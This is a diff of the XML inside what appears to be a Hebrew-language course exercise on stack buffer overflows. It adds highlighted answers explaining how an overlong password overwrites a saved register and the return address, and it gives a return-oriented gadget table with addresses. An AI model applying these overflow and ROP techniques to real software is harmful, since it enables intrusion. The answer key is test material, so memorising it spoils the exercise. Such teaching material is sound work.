-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>hash</w:t>
+        <w:t>y == hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4649,7 +4271,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4751,7 +4372,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4759,7 +4379,6 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -5050,29 +4669,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>main(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
+        <w:t xml:space="preserve"> main(){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5115,20 +4712,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>password[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> password[</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5170,32 +4755,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5237,32 +4798,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>scanf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    scanf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5324,42 +4861,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>)){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(checkPassword(password)){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5381,32 +4884,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5425,20 +4904,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>, password);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5482,7 +4949,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5503,7 +4969,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5548,32 +5013,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5584,7 +5025,6 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5595,7 +5035,6 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5637,18 +5076,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>-</w:t>
+        <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5670,7 +5098,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5733,7 +5160,6 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5744,7 +5170,6 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6074,31 +5499,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>אסמבלי</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> של </w:t>
+        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד אסמבלי של </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6121,7 +5522,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6132,7 +5532,6 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6164,13 +5563,36 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
           <w:rFonts w:cs="Arial"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6181,7 +5603,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">הפקודה </w:t>
+        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6192,7 +5614,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ret</w:t>
+        <w:t>0x6f69636f64696c61</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6204,7 +5626,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6213,9 +5635,10 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0x6f69636f64696c61</w:t>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6223,10 +5646,290 @@
           <w:rFonts w:cs="Arial" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">לאחר הכנסת הסיסמה, 16 התווים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>supercalifragili</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ייכנסו לתוך </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">מעל </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> במחסנית יש את </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ולכן 8 הבתים הבאים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sticexpi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידרסו את הערך שלו.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">לבסוף 8 הבתים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>alidocio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידרסו את ערך החזרה ששמור במחסנית.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">בזיכרון הם שמורים כך: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>61 6c 69 64 6f 63 69 6f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, ולכן לאחר שנקרא ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>little endian</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נקבל את התשובה.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6240,11 +5943,6 @@
         </w:pBdr>
         <w:bidi/>
         <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="28"/>
@@ -6252,6 +5950,72 @@
           <w:u w:val="single"/>
           <w:rtl/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:bidi/>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:bidi/>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:bidi/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:val="single"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>השאלה ממשיכה בעמוד הבא</w:t>
       </w:r>
       <w:r>
@@ -6456,7 +6220,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6467,7 +6230,6 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6757,20 +6519,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %</w:t>
+              <w:t>op %rdi</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rdi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6826,7 +6576,18 @@
                 <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>0x4016B0</w:t>
+              <w:t>0x401</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>178</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6877,7 +6638,6 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
